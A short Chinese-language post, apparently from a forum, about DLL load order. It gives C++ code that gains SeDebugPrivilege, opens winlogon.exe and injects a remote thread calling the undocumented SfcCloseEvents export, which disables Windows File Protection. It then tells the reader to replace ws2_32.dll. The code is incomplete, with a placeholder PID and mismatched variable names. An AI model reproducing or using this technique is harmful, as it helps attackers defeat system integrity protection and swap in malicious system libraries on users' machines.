一般来说,系统是按照SafeDllSearchMode 的顺序来调用DLL的。
新版的IE可能有点不太一样,是制定调用那个DLL的吧。我没有试过。
那么可以用关闭系统自动保护的方法。
//关闭SFC的保护
//文章来源:http://hi.baidu.com/tr0j4n/blog/item/173e4e3fe41dfc3470cf6c2c.html
HMODULE hSFCDll;
hSFCDll=LoadLibraryW(L"sfc_os");
hSFCDll=(hSFCDll!=NULL)?hSFCDll:LoadLibraryW(L"sfc");
DWORD ThdID,State;
PROC SfcCloseEvents;
HANDLE hWinLogonProcess(NULL),hThread(NULL);
BOOL bRet;
bRet=EnablePrivilege(TEXT("SeDebugPrivilege"),TRUE);
if(!bRet)
cout<<"EnablePrivilege Failed"<<endl;
hWinLogonProcess=OpenProcess(PROCESS_ALL_ACCESS,NULL,123);
//这里换成你自己的Winlogon.exe进程的PID,进程怎么遍历就不用我再说了吧?
if(!hWinLogonProcess)
return 0;
SfcCloseEvents=GetProcAddress(hSFCDll,MAKEINTRESOURCEA(2));
if(SfcCloseEvents)
{
hThread=CreateRemoteThread(hWinLogonProcess,NULL,0,(PVOID)SfcCloseEvents,NULL,0,&ThdId);
}
else
return 0;
/*各位这边自己WaitForSingleObject WAIT_FAILED WAIT_TIMEOUT WAIT_OBJECT_0 我就不赘述了,嫌麻烦。其实我本来准备写的,看到我上面那个State变量没?嘿嘿。
*/
if(hThread)
CloseHandle(hThread);
if(hWinLogonProcess)
CloseHandle(hWinLogonProcess);
然后你再替换下ws2_32.dll试试看
